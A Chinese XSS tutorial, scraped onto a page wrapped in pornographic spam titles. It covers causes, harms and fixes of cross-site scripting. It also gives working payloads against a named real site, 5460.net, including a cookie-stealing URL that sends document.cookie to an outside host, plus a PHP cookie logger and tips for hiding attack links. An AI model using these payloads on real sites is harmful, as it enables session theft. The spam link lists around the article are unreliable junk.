午夜视频免费看_日韩三级电影网站_国产精品久久一级_亚洲一级在线播放_人妻体内射精一区二区三区_91夜夜揉人人捏人人添红杏_91福利在线导航_国产又粗又猛又黄又爽无遮挡_欧美日韩一区在线播放_中文字幕一区二区三区四区不卡 _日日夜夜精品视频免费观看_欧美韩日一区二区三区

主頁 > 知識庫 > 跨站腳本執(zhí)行漏洞詳解與防護(hù)

跨站腳本執(zhí)行漏洞詳解與防護(hù)

熱門標(biāo)簽:vue 地圖標(biāo)注拖拽 電話機(jī)器人銷售公司嗎 保定電銷機(jī)器人軟件 自動外呼系統(tǒng)怎么防止封卡 土地證宗地圖標(biāo)注符號 客服外呼系統(tǒng)呼叫中心 成都銷售外呼系統(tǒng)公司 電話機(jī)器人案例 鎮(zhèn)江云外呼系統(tǒng)怎么樣
本文主要介紹跨站腳本執(zhí)行漏洞的成因,形式,危害,利用方式,隱藏技巧,解決方法和常見問題 (FAQ),由于目前介紹跨站腳本執(zhí)行漏洞的資料還不是很多,而且一般也不是很詳細(xì),所以希望本文能夠 比較詳細(xì)的介紹該漏洞。由于時間倉促,水平有限,本文可能有不少錯誤,希望大家不吝賜教。 

聲明,請不要利用本文介紹的任何內(nèi)容,代碼或方法進(jìn)行破壞,否則一切后果自負(fù)! 

【漏洞成因】 
原因很簡單,就是因為CGI程序沒有對用戶提交的變量中的HTML代碼進(jìn)行過濾或轉(zhuǎn)換。 

【漏洞形式】 
這里所說的形式,實際上是指CGI輸入的形式,主要分為兩種: 
1.顯示輸入 
2.隱式輸入 
其中顯示輸入明確要求用戶輸入數(shù)據(jù),而隱式輸入則本來并不要求用戶輸入數(shù)據(jù),但是用戶卻可以通 過輸入數(shù)據(jù)來進(jìn)行干涉。 
顯示輸入又可以分為兩種: 
1. 輸入完成立刻輸出結(jié)果 
2. 輸入完成先存儲在文本文件或數(shù)據(jù)庫中,然后再輸出結(jié)果 
注意:后者可能會讓你的網(wǎng)站面目全非!:( 
而隱式輸入除了一些正常的情況外,還可以利用服務(wù)器或CGI程序處理錯誤信息的方式來實施。 

【漏洞危害】 
大家最關(guān)心的大概就要算這個問題了,下面列舉的可能并不全面,也不系統(tǒng),但是我想應(yīng)該是比較典 型的吧。 
1. 獲取其他用戶Cookie中的敏感數(shù)據(jù) 
2. 屏蔽頁面特定信息 
3. 偽造頁面信息 
4. 拒絕服務(wù)攻擊 
5. 突破外網(wǎng)內(nèi)網(wǎng)不同安全設(shè)置 
6. 與其它漏洞結(jié)合,修改系統(tǒng)設(shè)置,查看系統(tǒng)文件,執(zhí)行系統(tǒng)命令等 
7. 其它 
一般來說,上面的危害還經(jīng)常伴隨著頁面變形的情況。而所謂跨站腳本執(zhí)行漏洞,也就是通過別人的 網(wǎng)站達(dá)到攻擊的效果,也就是說,這種攻擊能在一定程度上隱藏身份。 

【利用方式】 
下面我們將通過具體例子來演示上面的各種危害,這樣應(yīng)該更能說明問題,而且更易于理解。為了條 理更清晰一些,我們將針對每種危害做一個實驗。 
為了做好這些實驗,我們需要一個抓包軟件,我使用的是Iris,當(dāng)然你可以選擇其它的軟件,比如 NetXray什么的。至于具體的使用方法,請參考相關(guān)幫助或手冊。 
另外,需要明白的一點就是:只要服務(wù)器返回用戶提交的信息,就可能存在跨站腳本執(zhí)行漏洞。 
好的,一切就緒,我們開始做實驗!:) 

實驗一:獲取其他用戶Cookie中的敏感信息 
我們以國內(nèi)著名的同學(xué)錄站點5460.net為例來說明一下,請按照下面的步驟進(jìn)行: 
1. 進(jìn)入首頁http://www.5460.net/ 
2. 輸入用戶名“h1>”,提交,發(fā)現(xiàn)服務(wù)器返回信息中包含了用戶提交的“h1>”。 
3. 分析抓包數(shù)據(jù),得到實際請求: 
http://www.5460.net/txl/login/login.pl?username=h1>passwd=ok.x=28ok.y=6 
4. 構(gòu)造一個提交,目標(biāo)是能夠顯示用戶Cookie信息: 
http://www.5460.net/txl/login/login.pl?username=script>alert(document.cookie)/ script>passwd=ok.x=28ok.y=6 
5. 如果上面的請求獲得預(yù)期的效果,那么我們就可以嘗試下面的請求: 
http://www.5460.net/txl/login/login.pl?username=script>window.open("http://www.notfound.org/ info.php?"%2Bdocument.cookie)/script>passwd=ok.x=28ok.y=6 
其中http://www.notfound.org/info.php是你能夠控制的某臺主機(jī)上的一個腳本,功能是獲取查詢字符串的信 息,內(nèi)容如下: 
?php 
$info = getenv("QUERY_STRING"); 
if ($info) { 
$fp = fopen("info.txt","a"); 
fwrite($fp,$info."/n"); 
fclose($fp); 

header("Location: http://www.5460.net"); 
注:“%2B”為“+”的URL編碼,并且這里只能用“%2B”,因為“+”將被作為空格處理。后面的header語 句則純粹是為了增加隱蔽性。 
6. 如果上面的URL能夠正確運行的話,下一步就是誘使登陸5460.net的用戶訪問該URL,而我們就可以 獲取該用戶Cookie中的敏感信息。 
7. 后面要做什么就由你決定吧! 

實驗二:屏蔽頁面特定信息 
我們?nèi)匀灰?460.net作為例子,下面是一個有問題的CGI程序: 
http://www.5460.net/txl/liuyan/liuyanSql.pl 
該CGI程序接受用戶提供的三個變量,即nId,csId和cName,但是沒有對用戶提交的cName變量進(jìn)行任何檢 查,而且該CGI程序把cName的值作為輸出頁面的一部分,5460.net的用戶應(yīng)該都比較清楚留言右下角有你 的名字,對吧? 
既然有了上面的種種條件,我們可以不妨作出下面的結(jié)論: 
某個用戶可以“屏蔽”其兩次留言之間的所有留言! 
當(dāng)然,我們說的“屏蔽”不是“刪除”,用戶的留言還是存在的,只不過由于HTML的特性,我們無法從 頁面看到,當(dāng)然如果你喜歡查看源代碼的話就沒有什么用處了,但是出了我們這些研究CGI安全的人來 說,有多少人有事沒事都看HTML源代碼? 
由于種種原因,我在這里就不公布具體的細(xì)節(jié)了,大家知道原理就好了。 
注:仔細(xì)想想,我們不僅能屏蔽留言,還能匿名留言,Right? 

實驗三:偽造頁面信息 
如果你理解了上面那個實驗,這個實驗就沒有必要做了,基本原理相同,只是實現(xiàn)起來稍微麻煩一點而 已。 

實驗四:拒絕服務(wù)攻擊 
現(xiàn)在應(yīng)該知道,我們在某種程度上可以控制存在跨站腳本執(zhí)行漏洞的服務(wù)器的行為,既然這樣,我們 就可以控制服務(wù)器進(jìn)行某種消耗資源的動作。比如說運行包含死循環(huán)或打開無窮多個窗口的JavaScript腳本 等等。這樣訪問該URL的用戶系統(tǒng)就可能因此速度變慢甚至崩潰。同樣,我們也可能在其中嵌入一些腳 本,讓該服務(wù)器請求其它服務(wù)器上的資源,如果訪問的資源比較消耗資源,并且訪問人數(shù)比較多的話,那 么被訪問的服務(wù)器也可能被拒絕服務(wù),而它則認(rèn)為該拒絕服務(wù)攻擊是由訪問它的服務(wù)器發(fā)起的,這樣就可 以隱藏身份。 

實驗五:突破外網(wǎng)內(nèi)網(wǎng)不同安全設(shè)置 
這個應(yīng)該很好理解吧,一般來說我們的瀏覽器對不同的區(qū)域設(shè)置了不同的安全級別。舉例來說,對于 Internet區(qū)域,可能你不允許JavaScript執(zhí)行,而在Intranet區(qū)域,你就允許JavaScript執(zhí)行。一般來說,前者的 安全級別都要高于后者。這樣,一般情況下別人無法通過執(zhí)行惡意JavaScript腳本對你進(jìn)行攻擊,但是如果 與你處于相同內(nèi)網(wǎng)的服務(wù)器存在跨站腳本執(zhí)行漏洞,那么攻擊者就有機(jī)可乘了,因為該服務(wù)器位于Intranet 區(qū)域。 

實驗六:與其它漏洞結(jié)合,修改系統(tǒng)設(shè)置,查看系統(tǒng)文件,執(zhí)行系統(tǒng)命令等 
由于與瀏覽器相關(guān)的漏洞太多了,所以可與跨站腳本執(zhí)行漏洞一起結(jié)合的漏洞也就顯得不少。我想這 些問題大家都應(yīng)該很清楚吧,前些時間的修改IE標(biāo)題漏洞,錯誤MIME類型執(zhí)行命令漏洞,還有多種多樣 的蠕蟲,都是很好的例子。 
更多的例子請參考下列鏈接: 
Internet Explorer Pop-Up OBJECT Tag Bug 
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html 
Internet Explorer Javascript Modeless Popup Local Denial of Service Vulnerability 
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html 
MSIE6 can read local files 
http://www.xs4all.nl/~jkuperus/bug.htm 
MSIE may download and run progams automatically 
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html 
File extensions spoofable in MSIE download dialog 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html 
the other IE cookie stealing bug (MS01-055) 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html 
Microsoft Security Bulletin MS01-055 
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html 
Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing 
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html 
Incorrect MIME Header Can Cause IE to Execute E-mail Attachment 
http://www.kriptopolis.com/cua/eml.html 

跨站腳本執(zhí)行漏洞在這里的角色就是隱藏真正攻擊者的身份。 

實驗七:其它 
其實這類問題和跨站腳本執(zhí)行漏洞沒有多大關(guān)系,但是在這里提一下還是很有必要的。問題的實質(zhì)還 是CGI程序沒有過濾用戶提交的數(shù)據(jù),然后進(jìn)行了輸出處理。舉個例子來說,支持SSI的服務(wù)器上的CGI程 序輸出了用戶提交的數(shù)據(jù),無論該數(shù)據(jù)是采取何種方式輸入,都可能導(dǎo)致SSI指令的執(zhí)行。當(dāng)然,這是在服 務(wù)端,而不是客戶端執(zhí)行。其實像ASP,PHP和Perl等CGI語言都可能導(dǎo)致這種問題。 

【隱藏技巧】 
出于時間的考慮,我在這里將主要講一下理論了,相信不是很難懂,如果實在有問題,那么去找本書 看吧。 
1. URL編碼 
比較一下: 
http://www.5460.net/txl/login/login.pl?username=h1>passwd=ok.x=28ok.y=6 
http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3Epasswd=ok.x=28ok.y=6 
你覺得哪個更有隱蔽性?! 

2. 隱藏在其它對象之下 
與直接給別人一個鏈接相比,你是否決定把該鏈接隱藏在按鈕以下更好些呢? 

3. 嵌入頁面中 
讓別人訪問一個地址(注意這里的地址不同于上面提到的URL),是不是又要比讓別人按一個按鈕容易得 多,借助于Iframe,你可以把這種攻擊變得更隱蔽。 

4. 合理利用事件 
合理使用事件,在某些情況上可以繞過CGI程序?qū)斎氲南拗疲热缯f前些日子的SecurityFocus的跨站腳本 執(zhí)行漏洞。 

【注意事項】 
一般情況下直接進(jìn)行類似script>alert(document.cookie)/script>之類的攻擊沒有什么問題,但是有時 CGI程序?qū)τ脩舻妮斎脒M(jìn)行了一些處理,比如說包含在''或””之內(nèi),這時我們就需要使用一些小技巧 來繞過這些限制。 
如果你對HTML語言比較熟悉的話,繞過這些限制應(yīng)該不成問題。 

【解決方法】 
要避免受到跨站腳本執(zhí)行漏洞的攻擊,需要程序員和用戶兩方面共同努力: 
程序員: 
1. 過濾或轉(zhuǎn)換用戶提交數(shù)據(jù)中的HTML代碼 
2. 限制用戶提交數(shù)據(jù)的長度 

用戶: 
1. 不要輕易訪問別人給你的鏈接 
2. 禁止瀏覽器運行JavaScript和ActiveX代碼 

附:常見瀏覽器修改設(shè)置的位置為: 
Internet Explorer: 
工具->Internet選項->安全->Internet->自定義級別 
工具->Internet選項->安全->Intranet->自定義級別 
Opera: 
文件->快速參數(shù)->允許使用Java 
文件->快速參數(shù)->允許使用插件 
文件->快速參數(shù)->允許使用JavaScript 

【常見問題】 
Q:跨站腳本執(zhí)行漏洞在哪里存在? 
A:只要是CGI程序,只要允許用戶輸入,就可能存在跨站腳本執(zhí)行漏洞。 

Q:跨站腳本執(zhí)行漏洞是不是只能偷別人的Cookie? 
A:當(dāng)然不是!HTML代碼能做的,跨站腳本執(zhí)行漏洞基本都能做。 

標(biāo)簽:臺灣 成都 天津 公主嶺 內(nèi)江 懷化 麗江 重慶

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《跨站腳本執(zhí)行漏洞詳解與防護(hù)》,本文關(guān)鍵詞  跨站,腳本,執(zhí)行,漏洞,詳解,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《跨站腳本執(zhí)行漏洞詳解與防護(hù)》相關(guān)的同類信息!
  • 本頁收集關(guān)于跨站腳本執(zhí)行漏洞詳解與防護(hù)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    在线成人午夜影院| 亚洲 高清 成人 动漫| 日韩欧美二区三区| 91麻豆福利精品推荐| 在线播放av网址| 亚洲国产另类久久久精品极度| 欧美激情小视频| 欧美成人一二三区| 色综合av综合无码综合网站| 成人乱人伦精品视频在线观看| 久久香蕉精品视频| 一本色道久久综合亚洲二区三区 | 欧美极品欧美精品欧美图片| 久久精品国产欧美激情| 日韩欧美在线一区| 91免费观看在线| 亚洲成人第一网站| 欧美日韩一区二区三区四区五区六区 | 色哟哟免费网站| 性日韩欧美在线视频| 精品人在线二区三区| 亚洲成人在线网站| kk眼镜猥琐国模调教系列一区二区| 亚洲日本韩国在线| 精品少妇一区二区三区密爱| 亚洲人成无码网站久久99热国产 | 国产理论视频在线观看| 亚洲男人在线天堂| 性生活免费在线观看| 伊人久久大香线蕉午夜av| 97不卡在线视频| 中文字幕精品在线视频| 欧美成人性福生活免费看| 国产精品久久毛片| 天堂蜜桃91精品| 亚洲综合一区中| 国产免费a视频| 日韩 欧美 中文| 精品熟女一区二区三区| 99九九99九九九99九他书对| 青青在线免费观看| 国产人妻人伦精品| 欧美日韩精品不卡| 国产精品极品美女在线观看免费| 自拍视频国产精品| 欧美精品在线观看播放| 欧美亚洲综合网| 一本到不卡精品视频在线观看| av电影一区二区| 美女看a上一区| 懂色av成人一区二区三区| 成人在线免费看视频| 国产极品国产极品| 日本妇女毛茸茸| 免费成人深夜夜行p站| 在线观看中文av| 冲田杏梨av在线| 缅甸午夜性猛交xxxx| 免费成人深夜夜行网站视频| 久久综合中文色婷婷| 欧美综合77777色婷婷| 欧美日韩精品免费在线观看视频| 国产精品直播网红| 清纯唯美亚洲综合| 91久久久国产精品| 国产精华一区二区三区| 国内一区在线| av资源站久久亚洲| 久久资源av| 久久综合一区二区三区| 亚洲天堂第一区| 人妻精品无码一区二区三区| 黄色aaa级片| 强迫凌虐淫辱の牝奴在线观看| 日本xxxx黄色| 182午夜视频| 一区二区精品免费| 99久久久无码国产精品性| 成人在线观看高清| 69夜色精品国产69乱| 久草视频免费在线播放| 亚洲精品国产欧美在线观看| 91麻豆精品久久毛片一级| 在线看片中文字幕| 日韩欧美性视频| 国产一区二区在线不卡| 日韩av在线免费观看不卡| 精品一区二区免费在线观看| 国产一区二区三区免费观看| 国产mv日韩mv欧美| 亚洲美女视频一区| 精品欧美aⅴ在线网站| 91麻豆精品国产91久久久久久| 日韩午夜在线观看| 亚洲精品999| 日韩有码在线观看| 国产精品一二三视频| 国产精品一区二区三区在线观| 国内外成人激情免费视频| 性久久久久久久久久久久久久| 91小视频在线播放| 成人免费网站黄| 天天爽夜夜爽人人爽| 少妇av在线播放| 9l国产精品久久久久麻豆| 欧美激情中文不卡| 精品人在线二区三区| 久久男人资源视频| 国产一区二区香蕉| 精品国产_亚洲人成在线| 国产精品wwwww| 国产探花在线观看视频| 中文字幕69页| 国产一本一道久久香蕉| 国产精品午夜在线| 亚洲精品久久久久中文字幕二区| 91精品久久久久久久久久入口| 免费影院在线观看一区 | 国产午夜精品全部视频播放| 欧美亚洲视频在线看网址| 日本老太婆做爰视频| 人妻互换一区二区激情偷拍| 精品91久久久| 熟妇人妻一区二区三区四区 | 中文字幕第15页| 日韩av中文在线观看| 国产欧美日韩亚州综合| 精品久久国产老人久久综合| 国产综合在线观看视频| 国产尤物av一区二区三区| 在线免费观看av网| 精品一区二区三区国产| 色婷婷精品国产一区二区三区| 色天使在线观看| 最新在线中文字幕| 国产精品一二三四五| 8x8x8国产精品| 日本欧美一二三区| 免费看黄色a级片| 久久午夜福利电影| 寂寞少妇一区二区三区| 欧美深夜福利视频| 狠狠人妻久久久久久| 国产精品久久久一本精品| 少妇激情综合网| 强伦女教师2:伦理在线观看| 国产老熟女伦老熟妇露脸| 国产一区二区在线播放视频| 国产精品美女久久久久久久久| 精品精品国产国产自在线| 欧美日韩系列| 国产7777777| 成人av资源在线观看| 亚洲情综合五月天| 日韩国产精品毛片| 国产精品50页| 亚洲免费毛片网站| 国产成人精品视频| 免费看日本毛片| 精品国产亚洲AV| 欧美精品一二三四| 成人乱人伦精品视频在线观看| 日本一二三区视频在线| 欧美丰满艳妇bbwbbw| 国产一区二区三区观看| 亚洲视频专区在线| 欧美日韩在线一| 亚洲国产精品成人久久蜜臀| 日韩亚洲欧美在线观看| 97视频中文字幕| 国产三级视频网站| 免费在线观看成人| 日韩一卡二卡三卡| 久久天天东北熟女毛茸茸| 欧美成人aaa片一区国产精品| 欧美激情一区二区三区四区| 国产成人91久久精品| 三级性生活视频| 国 产 黄 色 大 片| 一区二区欧美在线观看| 日本国产精品视频| 永久看看免费大片| 麻豆一区二区99久久久久| 日韩欧美一区二区三区在线| 中文字幕色呦呦| av综合在线观看| 亚洲高清av在线| ww国产内射精品后入国产| 国产中文字幕精品| 久久躁狠狠躁夜夜爽| 成人手机在线免费视频| 国产欧美日韩视频一区二区| 欧美在线视频一区二区| 午夜男人的天堂| 亚洲欧美激情小说另类| 激情小说综合区| 欧美一级做性受免费大片免费| 亚洲欧美成人网| 黄色av电影网站| 亚洲国产精品国自产拍av| 精品乱子伦一区二区三区| 99国产精品欲| 欧美videos大乳护士334| 亚洲黄色av网址| 国产91精品一区二区麻豆亚洲| 国产精品视频白浆免费视频| 极品久久久久久久| 日韩美女视频19| 一区二区三区免费看| 美女www一区二区| 久久精品国产91精品亚洲| 国产熟妇久久777777| 欧美日韩综合一区| 久久久久久久久久久免费视频| 91在线观看高清| 色噜噜狠狠色综合网| 国产一区高清在线| 成人性生交大片免费观看嘿嘿视频| 国产污视频网站| 亚洲男人天堂2024| 国产一区二区三区视频播放| 欧美一二三区在线观看| 中国一级特黄录像播放| 最新国产精品久久精品| 精品少妇在线视频| www.亚洲人| 黑人中文字幕一区二区三区| 水野朝阳av一区二区三区| 成人欧美一区二区三区黑人| 性生活三级视频| 奇门遁甲1982国语版免费观看高清 | 欧美三级免费看| 欧美草草影院在线视频| www亚洲色图| 亚洲欧美综合精品久久成人| 精品无码久久久久| 欧美成人免费小视频| 91视频免费网址| 欧美性在线视频| 国产又粗又猛又黄又爽无遮挡| 国产成人亚洲精品| 欧美男人天堂网| 91麻豆精品91久久久久同性| 国产精品一区二区在线免费观看| 欧美日韩国产影片| 国产精品成人99一区无码| 五月激情综合色| 99久久人妻精品免费二区| 538在线一区二区精品国产| 亚洲第一成肉网| 91精品国产一区二区| 爱爱视频免费在线观看| 久久夜精品香蕉| 在线免费观看av网址| 欧美精品国产精品日韩精品| www.成人免费视频| 久久久久久国产精品mv| 国产一区久久久| 久久天堂国产精品| 久久精品夜色噜噜亚洲aⅴ| 中文字幕第80页| 欧洲av一区二区嗯嗯嗯啊| 欧美xxxxx精品| 国产亚洲精品va在线观看| 精品视频在线观看免费| 人九九综合九九宗合| 欧美在线 | 亚洲| 欧美一二三区| 亚洲国产视频直播| 亚洲熟女少妇一区二区| 欧美精品18videosex性欧美| 天堂资源在线中文精品| 婷婷精品国产一区二区三区日韩| 亚洲免费在线看| 18精品爽国产三级网站| 91av视频在线免费观看| 国产成人一区在线| 一道本视频在线观看| 亚洲精品一区二三区不卡| 国产免费黄色大片| 艳母动漫在线免费观看| 亚洲国产日韩一区二区| 日韩精品电影一区二区三区| 久久免费视频在线观看| 成人免费毛片a| www.黄色网| 欧美大片免费观看| 日韩va欧美va亚洲va久久| 国产精品99久久99久久久二8| 国产精品老熟女视频一区二区| 成人欧美一区二区三区在线湿哒哒| 国产三级欧美三级日产三级99 | 91精品久久久久久久久中文字幕| 成人午夜又粗又硬又大| 久草福利视频在线| 久久亚洲私人国产精品va| 丰满少妇久久久久久久| 国产中文字幕一区二区| www.欧美精品| 2欧美一区二区三区在线观看视频 337p粉嫩大胆噜噜噜噜噜91av | 真人做人试看60分钟免费| 精品国产污网站| 蓝色福利精品导航| 男人添女人荫蒂国产| 国产精品久久网| 五月天婷婷综合| 一卡二卡三卡在线观看| 69堂免费视频| 亚洲图片欧美午夜| 久久婷婷丁香| 亚洲日本久久久| 91精品国产综合久久香蕉最新版 | 日本r级电影在线观看| 久久久久日韩精品久久久男男| 国产一区二区福利视频| 在线观看福利片| 亚洲自拍小视频| 欧美日韩亚洲精品一区二区三区| 国产精品免费无遮挡| 日韩精品视频久久| 欧美人交a欧美精品| 亚洲欧美偷拍三级| 国产第100页| 精品少妇人欧美激情在线观看| 欧美巨猛xxxx猛交黑人97人| 国产精品污污网站在线观看| 国产精品麻豆一区| 亚洲欧美国产不卡| 久久亚洲精品视频| 亚洲第一狼人社区| 91女人18毛片水多国产| 久久精品无码一区二区三区毛片| 欧美在线视频一区| 在线区一区二视频| 日韩在线观看视频一区二区三区| a视频免费观看| 亚洲v国产v在线观看| 欧美精品一区二区三区蜜桃| 欧美bbbbb| 久久av高潮av无码av喷吹| 男人揉女人奶房视频60分| 国产美女精品视频| 欧美日韩亚洲不卡| 日本伊人色综合网| 欧美黄片一区二区三区| 在线观看一区二区三区三州| 久久99精品视频一区97| 综合久久久久久久| 久久婷婷麻豆| 久久精品国产亚洲AV成人婷婷| 人妻夜夜添夜夜无码av| 97免费中文视频在线观看| 欧美精品久久99久久在免费线| 高清在线成人网| 国偷自拍第113页| 91香蕉视频污版| 国严精品久久久久久亚洲影视 | 国产中文字幕精品| 成年人晚上看的视频| 免费成人深夜夜行p站| 日韩欧美三级一区二区| 欧美性在线视频| 亚洲欧美综合v| 亚洲一区二区精品久久av| 奇米精品一区二区三区在线观看一| 久久免费小视频| 精品国产aⅴ一区二区三区东京热| 久久九九视频| 性欧美xxxx| 亚洲第一精品夜夜躁人人躁| 亚洲国产综合人成综合网站| 久久99久久99精品免视看婷婷| 四虎永久在线精品| 三级男人添奶爽爽爽视频| 久艹在线免费观看| 看高清中日韩色视频| 国产精品色午夜在线观看| 日韩精品免费一线在线观看| 姬川优奈aav一区二区| 久久影院午夜论| 国产专区欧美精品| 国产伦理一区二区| 久久久99精品| 四虎地址8848| 亚洲天堂国产视频| 亚洲三区视频| 精品日本一区二区| 成人激情春色网| 国产成人高清激情视频在线观看| 久久电影一区二区| 日韩精品一区二区三区中文精品| 亚洲猫色日本管| 国产精品看片你懂得| 精品亚洲porn| 日韩不卡免费视频| 隣の若妻さん波多野结衣| 国产精品高潮呻吟av| 久久黄色小视频| 免费人成视频在线| 欧美精品一区二区蜜桃| 人妖粗暴刺激videos呻吟| 欧美黄网站在线观看| 亚洲中文字幕无码中文字| 欧美日韩在线免费观看视频| 国产精品一码二码三码在线| 清纯唯美亚洲激情| 九九热精品视频| 久久久久久九九九| 97色在线视频| 国产福利视频一区|